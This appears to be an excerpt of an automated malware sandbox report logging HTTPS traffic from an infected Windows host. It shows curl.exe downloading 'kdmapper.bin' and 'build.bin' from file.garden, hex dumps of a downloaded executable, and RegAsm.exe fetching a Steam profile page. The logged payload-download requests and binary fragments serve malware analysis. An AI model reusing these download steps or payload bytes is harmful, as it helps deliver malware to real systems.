                                                                                                                                                                                                                                                                                    2024-09-30 16:20:10 UTC1369INData Raw: fd 78 fb a4 4a 66 99 b7 53 7b ab 06 7e 5a 05 99 c0 73 8c 4e 9a 7f e0 a9 b8 bb 14 a6 a8 5c 1a a0 70 56 77 95 cb 60 ea f7 bd 64 a8 ad ed 88 06 bb 5b 72 ee d7 a1 63 0c c0 b6 e0 94 e1 89 45 44 62 8f 3d a8 94 a1 e7 09 42 7c 41 33 28 c6 58 3d 1d da 3f e7 7b 49 70 e7 35 60 9f 9b 87 44 53 df 66 84 31 6a ee 36 26 46 b0 56 9e c8 fb 80 f2 ca b0 63 9b 0d 09 0b 4e 91 13 12 49 99 55 15 a3 9d 4d 82 75 63 d2 30 d5 c5 09 a7 84 19 fe bc 83 9e e6 4d 65 a2 3f 84 12 43 c6 a8 38 32 73 41 50 39 92 3f 92 ce 36 d4 69 d5 e5 32 cf 30 46 44 1f 74 23 d4 43 b8 34 1d 3f 70 41 e9 7c e1 92 79 a3 55 73 6d 6a 8d 65 7c 11 5c 0e 3c f1 7f 8d bb bb 5f 0b da fd c8 74 09 64 d8 20 c1 d3 24 7d 84 64 34 cd fe 4e 6c af 36 fe 81 2a 0b f1 19 ac 66 a3 ad 8f e9 b1 09 d3 d4 94 e6 63 89 1f 5f 04 98 01 21
                                                                                                                                                                                                                                                                                    Data Ascii: xJfS{~ZsN\pVw`d[rcEDb=B|A3(X=?{Ip5`DSf1j6&FVcNIUMuc0Me?C82sAP9?6i20FDt#C4?pA|yUsmje|\<_td $}d4Nl6*fc_!
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:10 UTC1369INData Raw: 21 cd 72 e1 17 34 2f 56 df 2b d7 80 70 53 e2 5f 70 18 8b 55 25 32 1a 39 0b 05 fb 5c 9a 55 a5 3f 8a 3b da 24 81 58 a3 8a ad 79 c7 8c e4 c2 21 9f 3e 1f 46 66 e1 ff 39 d9 33 82 52 a4 b1 4b a6 e1 ea 7a 06 56 3c 2a bb ec 8c d3 3a 65 c9 90 79 ab cf 79 7d b5 8d d9 56 c2 98 b3 54 5a 5a 3d 2c 24 eb 0c 12 47 7a 2a 5c b7 64 e1 ee 3e 76 7b bc eb 66 23 88 d0 2a ef 2f cb 4b 5e 66 5f 47 f4 ba a6 81 78 3a a6 5d 97 0c 3a ff 2e c9 51 e4 b5 d5 3a 7e 3c f1 26 eb ec 98 a2 b4 83 9c 3f 21 20 2e 13 a1 f2 da 4b 3d f4 2c f3 72 e8 eb 50 33 e4 ef 1e 1a 92 bb 48 1c da a3 36 34 b2 eb 90 4e af 06 bc 31 da ea 38 8d 15 d1 85 5d 52 6e 0b 99 9a a1 3c b6 6d 53 3f ad 6f 64 a3 f4 95 fa 0d 9c ab 44 37 03 53 68 f0 8f c3 56 5e 4a 41 81 ff 4b 93 f4 56 6a cd 5c 7e 19 a7 90 8a 89 65 d3 70 24 5d 52
                                                                                                                                                                                                                                                                                    Data Ascii: !r4/V+pS_pU%29\U?;$Xy!>Ff93RKzV<*:eyy}VTZZ=,$Gz*\d>v{f#*/K^f_Gx:]:.Q:~<&?! .K=,rP3H64N18]Rn<mS?odD7ShV^JAKVj\~ep$]R
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:10 UTC1369INData Raw: bc d8 05 68 d8 da f5 21 9f a7 4c a0 33 85 79 90 91 bd 38 73 36 7d 2a d6 a9 8a 2e 5e 35 6b 60 d7 49 b9 f9 9b 04 ce 38 5b de b3 1c 04 1f 5d e5 f0 2d e8 5c ae ef 28 57 2f 89 1e d5 5b da 3a 3d 16 58 6f 5f 40 af 93 12 92 0b 71 c6 87 b4 b6 88 a7 24 87 22 97 47 9d 38 9d a8 d2 74 8b aa cb c0 ff cc 05 fc 0d 78 25 72 3a 80 32 16 d0 59 2d dd 4e 6f 73 b1 cf 53 6d e5 25 8e 0a 41 5e ff 54 32 e0 3c 2f 7c aa f0 7f c1 4c 7c 5b 9c 08 c1 8c fb 32 7d c4 01 de 63 72 22 44 0a 65 4e bf 18 29 d7 76 bd 76 5f 91 65 48 2a 8b a9 ec 34 e3 6a 6e f5 bf 6d 13 83 9a 24 ef 95 57 53 10 c8 9d ca fb 5f 6b ff b5 07 a8 aa 35 a1 63 95 a4 f3 03 b1 9e 3a 11 54 d2 e6 95 ea 69 d4 4e 53 93 fe e1 e5 52 6a d5 58 f2 90 2a 27 12 cf 54 44 d4 08 b2 ce 94 7c c2 af fd 4b 7b e0 ea d9 ed 33 b5 05 f6 31 0c 3f
                                                                                                                                                                                                                                                                                    Data Ascii: h!L3y8s6}*.^5k`I8[]-\(W/[:=Xo_@q$"G8tx%r:2Y-NosSm%A^T2</|L|[2}cr"DeN)vv_eH*4jnm$WS_k5c:TiNSRjX*'TD|K{31?


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    2192.168.2.1049714188.114.97.34437592C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:14 UTC104OUTGET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: file.garden
                                                                                                                                                                                                                                                                                    User-Agent: curl/7.83.1
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:14 UTC819INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:20:14 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                    Content-Length: 2284739
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    x-powered-by: Express
                                                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                                                    content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                                                                                                                                                                    last-modified: Fri, 20 Sep 2024 19:21:00 GMT
                                                                                                                                                                                                                                                                                    Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Age: 853133
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2FYhWvGVjf7%2FpurLT2TUZThXoZpmJHQxTCeJvXzacyGxbGFmQTjsLgC1ck8hHZ7x9PkQzCsCfaKPyAAprODc54vKL%2Fb0d7vhlnxnavMnA%2FZm9%2BK0IjBYmvyCRyZSzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    CF-RAY: 8cb58a04ef188c89-EWR
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:14 UTC550INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d
                                                                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:14 UTC1369INData Raw: 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c0 ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 df 00 00 00 40 06 00 00 e0 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 20 07 00 00 24 00 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: `.rdata0 @@.data G@.didat0@.rsrc@@@.reloc<# $@B
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:14 UTC1369INData Raw: 00 e8 3c cf 00 00 32 c0 5d c2 1c 00 55 8b ec 83 ec 4c ff 75 08 8d 4d b4 e8 2a 02 00 00 8b 4d f4 83 f9 08 73 0a 8b 45 0c 89 44 8d b4 ff 45 f4 8d 4d b4 e8 48 02 01 00 c9 c2 08 00 56 ff 74 24 08 8b f1 33 c0 89 06 89 46 04 89 46 08 89 46 0c 88 46 10 e8 5c 03 00 00 8b c6 5e c2 04 00 b8 35 26 43 00 e8 92 d7 01 00 51 51 53 56 8b f1 89 75 f0 e8 62 81 00 00 33 db c7 06 f8 35 43 00 8d 8e 38 10 00 00 89 5d fc e8 2d 4a 00 00 8d 8e f8 20 00 00 c6 45 fc 01 e8 27 ba 00 00 8d 8e 98 22 00 00 89 9e e8 21 00 00 89 9e ec 21 00 00 e8 4a 01 00 00 8d 8e e8 45 00 00 e8 3f 01 00 00 8b 4d 08 85 c9 c6 45 fc 04 0f 94 c0 89 9e d4 21 00 00 88 86 d0 21 00 00 85 c9 75 23 68 f0 92 00 00 e8 d7 d6 01 00 59 89 45 ec c6 45 fc 05 85 c0 74 09 8b c8 e8 91 a0 00 00 eb 06 8b c3 eb 02 8b c1 89 86
                                                                                                                                                                                                                                                                                    Data Ascii: <2]ULuM*MsEDEMHVt$3FFFF\^5&CQQSVub35C8]-J E'"!!JE?ME!!u#hYEEt
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:14 UTC1369INData Raw: 00 75 0b 8d 46 32 50 6a 39 e8 a5 fa ff ff 6a 02 b9 98 10 44 00 e8 3f 53 00 00 5e c2 04 00 53 56 8b f1 33 db 57 53 8b 3e 38 9e 3c 22 00 00 74 3d 8b 86 d8 6c 00 00 8b 4f 10 83 c0 14 53 50 ff 15 78 32 43 00 8b ce ff 57 10 8b ce e8 05 22 00 00 85 c0 74 15 83 be f4 21 00 00 75 75 0c 8b 44 24 10 39 58 04 0f 97 c0 eb 3c 32 c0 eb 38 e8 85 08 00 00 8b 4f 10 52 50 ff 15 78 32 43 00 8b ce ff 57 10 68 70 36 43 00 8b ce e8 3d 26 00 00 85 c0 74 11 ff 74 24 10 8b ce e8 db 04 00 00 84 c0 74 02 b3 01 8a c3 5f 5e 5b c2 04 00 80 b9 d4 6c 00 00 00 8b 54 24 04 74 1a 8b c2 f7 d8 83 e0 0f 03 d0 83 b9 c8 6c 00 00 03 75 05 83 c2 10 eb 03 83 c2 08 8b c2 c2 04 00 55 8b e9 80 bd ce 6c 00 00 00 75 04 32 c0 eb 41 8b 45 00 53 56 57 8b 70 14 8b ce ff 15 78 32 43 00 8b cd ff d6 ff 74 24
                                                                                                                                                                                                                                                                                    Data Ascii: uF2Pj9jD?S^SV3WS>8<"t=lOSPx2CW"t!uuD$9X<28ORPx2CWhp6C=&tt$t_^[lT$tluUlu2AESVWpx2Ct$
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:14 UTC1369INData Raw: 06 84 c0 75 04 6a 02 eb 10 3c 01 75 04 6a 03 eb 08 2c 02 3c 02 77 03 6a 04 59 8b c1 c2 08 00 b8 73 26 43 00 e8 1e cd 01 00 83 ec 18 53 33 db 8b c1 89 45 f0 89 5d dc 89 5d e0 89 5d e4 89 5d e8 88 5d ec 53 53 8d 4d dc 89 5d fc 51 8b c8 e8 36 1d 00 00 84 c0 0f 84 83 00 00 00 56 57 8b 7d e0 8d 4d dc 6a 01 e8 97 f8 ff ff 8b 4d e0 8b 45 dc 8b 75 08 88 5c 01 ff 8d 47 01 50 8b ce e8 f6 f9 ff ff 8b 45 f0 83 b8 c8 6c 00 00 03 75 0f ff 76 04 ff 36 ff 75 dc e8 6f fd 00 00 eb 2d f6 80 0c 46 00 00 01 74 17 d1 ef 57 ff 36 ff 75 dc e8 19 fd 00 00 8b 06 33 c9 66 89 0c 78 eb 0d ff 76 04 ff 36 ff 75 dc e8 89 fc 00 00 ff 36 e8 11 1f 02 00 59 50 8b ce e8 9e f9 ff ff 5f b3 01 5e 8b 45 dc c7 45 fc 02 00 00 00 85 c0 74 19 80 7d ec 00 74 0c ff 75 e4 50 e8 19 d5 00 00 8b 45 dc 50
                                                                                                                                                                                                                                                                                    Data Ascii: uj<uj,<wjYs&CS3E]]]]]SSM]Q6VW}MjMEu\GPEluv6uo-FtW6u3fxv6u6YP_^EEt}tuPEP
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:14 UTC1369INData Raw: 03 8b e9 75 0d 8b 47 18 2b c2 83 f8 01 75 03 8d 69 01 8d b3 28 10 00 00 55 8b ce e8 13 fd ff ff 55 ff 36 8b cf e8 a9 a8 00 00 e9 90 04 00 00 8b cf e8 3b a9 00 00 8b c8 89 44 24 20 c1 e9 02 8d ab 08 21 00 00 80 e1 01 88 8b 06 21 00 00 8b c8 c1 e9 03 80 e1 01 88 8b 07 21 00 00 c6 83 08 22 00 00 00 c6 45 00 00 a8 01 74 29 8b cf e8 ff a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 55 8b cf e8 4b a8 00 00 8b 44 24 20 c6 84 1e 08 21 00 00 00 a8 02 74 2b 8b cf e8 d2 a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 8d 83 08 22 00 00 8b cf 50 e8 18 a8 00 00 c6 84 1e 08 22 00 00 00 80 bb 06 21 00 00 00 74 0d 8b cf e8 9e a8 00 00 89 83 08 23 00 00 80 bb 07 21 00 00 00 74 0d 8b cf e8 88 a8 00 00 89 83 0c 23 00 00 c6 83 05 21 00 00 01 e9 c4 03 00 00 8b cf e8 6f
                                                                                                                                                                                                                                                                                    Data Ascii: uG+ui(UU6;D$ !!!"Et);rVUKD$ !t+;rV"P"!t#!t#!o
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:14 UTC1369INData Raw: 8b cb ff d6 83 f8 08 74 0c 8b cb e8 09 17 00 00 e9 e2 09 00 00 33 c9 8d 45 40 51 51 51 51 50 8b 83 d4 21 00 00 8d b3 38 10 00 00 05 24 60 00 00 50 6a 04 51 8b ce e8 1c 37 00 00 89 75 3c eb 03 88 4d 5a 57 8d 4d 1c e8 5b a4 00 00 83 7d 34 00 74 b7 8d 4d 1c e8 89 a2 00 00 0f b7 c0 8d 4d 1c 89 83 fc 21 00 00 c6 83 0c 22 00 00 00 e8 5a a2 00 00 8d 4d 1c 0f b6 f0 e8 66 a2 00 00 0f b7 c0 8d 4d 1c 89 83 04 22 00 00 c1 e8 0e 24 01 88 83 0c 22 00 00 e8 4a a2 00 00 0f b7 c8 89 8b 08 22 00 00 89 b3 00 22 00 00 3b cf 73 0c 8b cb e8 41 f7 ff ff e9 3f 09 00 00 8b c6 6a 02 5a 83 e8 73 74 2a 83 e8 01 74 1b 83 e8 06 74 09 83 e8 01 75 28 6a 05 eb 02 6a 03 58 89 83 00 22 00 00 8b f0 eb 17 89 93 00 22 00 00 8b f2 eb 0d 33 f6 c7 83 00 22 00 00 01 00 00 00 46 89 b3 f4 21 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: t3E@QQQQP!8$`PjQ7u<MZWM[}4tMM!"ZMfM"$"J"";sA?jZst*ttu(jjX""3"F!
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:14 UTC1369INData Raw: ff ff 50 e8 4c 10 02 00 40 59 3b f8 76 22 68 00 08 00 00 ff 75 54 8b cf 2b c8 51 8d 8d d0 df ff ff 03 c1 50 8b c1 8d 4d 00 57 50 e8 1a 3b 00 00 8b 4d 54 33 c0 66 39 01 75 14 6a 01 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 30 d4 00 00 56 8b cb e8 a2 f2 ff ff e9 3f 01 00 00 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 db ec 00 00 8b 46 0c 2b 45 50 f7 46 08 00 04 00 00 8d 78 e0 74 03 8d 78 d8 85 ff 0f 8e f6 00 00 00 8d 8e 28 10 00 00 57 e8 eb f1 ff ff 57 8d be 28 10 00 00 ff 37 8d 4d 1c e8 7a 9d 00 00 68 78 36 43 00 ff 75 54 e8 59 0f 02 00 59 59 85 c0 0f 85 c2 00 00 00 83 be 2c 10 00 00 14 0f 82 b5 00 00 00 8b 0f 0f b6 41 0b 99 8b f0 8b fa 0f b6 41 0a 0f a4 f7 08 99 c1 e6 08 03 f0 0f b6 41 09 13 fa 99 0f a4 f7 08 c1 e6 08 03 f0 0f b6 41 08 13 fa 99 0f a4 f7 08
                                                                                                                                                                                                                                                                                    Data Ascii: PL@Y;v"huT+QPMWP;MT3f9ujhQP0V?hQPF+EPFxtx(WW(7Mzhx6CuTYYY,AAAA
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:14 UTC1369INData Raw: cb ff d6 83 f8 10 0f 85 17 01 00 00 8b 83 d4 21 00 00 80 b8 24 61 00 00 00 75 0d e8 ae e7 00 00 c6 45 6b 00 84 c0 74 04 c6 45 6b 01 8b cb e8 a5 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 8d bb 7c 22 00 00 57 05 24 60 00 00 8d b3 38 10 00 00 50 6a 05 51 8b ce e8 3e 2c 00 00 80 bb 74 22 00 00 00 74 7d 8d 83 8c 22 00 00 6a 08 50 8d 45 28 50 e8 33 d8 01 00 83 c4 0c 85 c0 74 64 80 7d 6b 00 8d 43 32 50 50 75 5e 68 83 00 00 00 e8 ee eb ff ff 8b 8b d4 21 00 00 81 c1 24 60 00 00 e8 35 be 00 00 8b cb e8 22 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 57 05 24 60 00 00 50 6a 05 51 8b ce e8 c7 2b 00 00 80 bb 74 22 00 00 00 8d 83 8c 22 00 00 75 89 89 75 50 eb 22 6a 06 e8 93 eb ff ff 6a 0b b9 98 10 44
                                                                                                                                                                                                                                                                                    Data Ascii: !$auEktEkE(3PQx"EP!|"W$`8PjQ>,t"t}"jPE(P3td}kC2PPu^h!$`5"E(3PQx"EP!W$`PjQ+t""uuP"jjD
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:14 UTC1369INData Raw: 94 00 00 8d 4d 30 88 46 18 e8 ff 93 00 00 8b 8b 04 22 00 00 33 d2 c1 e9 06 42 8b f8 c7 86 fc 10 00 00 02 00 00 00 8a 46 18 22 ca 88 8e f8 10 00 00 3a c2 75 08 89 96 fc 10 00 00 eb 0b 84 c0 75 07 83 a6 fc 10 00 00 00 8b 4e 08 8b c1 c1 e8 03 22 c2 88 86 98 10 00 00 8b c1 c1 e9 05 c1 e8 04 22 ca 22 c2 88 8e fa 10 00 00 83 7d 64 02 8b 4d 60 88 86 99 10 00 00 75 09 f6 c1 40 74 04 8a c2 eb 02 32 c0 88 86 f0 10 00 00 8a 86 94 10 00 00 22 c2 c1 e9 0a 88 86 f1 10 00 00 83 e1 0f 0f b6 c0 ba 00 00 02 00 d3 e2 f7 d8 1b c0 f7 d0 23 c2 89 86 f4 10 00 00 0f b6 86 9b 10 00 00 f7 d8 1b c0 83 e0 05 89 86 9c 10 00 00 b8 ff 1f 00 00 3b f8 72 02 8b f8 57 8d 85 8c df ff ff 50 8d 4d 30 e8 8a 92 00 00 c6 84 3d 8c df ff ff 00 8d 85 8c df ff ff 68 00 08 00 00 8d 7e 28 57 50 e8 4b
                                                                                                                                                                                                                                                                                    Data Ascii: M0F"3BF":uuN"""}dM`u@t2"#;rWPM0=h~(WPK


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    3192.168.2.1049715104.102.49.2544438060C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:18 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:19 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:20:19 GMT
                                                                                                                                                                                                                                                                                    Content-Length: 34678
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Set-Cookie: sessionid=dffd39bf6a72115ef3027e57; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:19 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:19 UTC16384INData Raw: 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f
                                                                                                                                                                                                                                                                                    Data Ascii: ss': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_actio
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:19 UTC3768INData Raw: 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: eLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content ">
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:19 UTC12INData Raw: 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                    Data Ascii: dy></html>


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    4192.168.2.1049718188.114.97.34438132C:\Windows\System32\curl.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:18 UTC101OUTGET /ZmE_ziOgiFXI9Y48/build.bin HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: file.garden
                                                                                                                                                                                                                                                                                    User-Agent: curl/7.83.1
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    2024-09-30 16:20:18 UTC812INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:20:18 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                    Content-Length: 351232
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    x-powered-by: Express
                                                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                                                    content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                                                                                                                                                                    last-modified: Mon, 30 Sep 2024 14:04:07 GMT
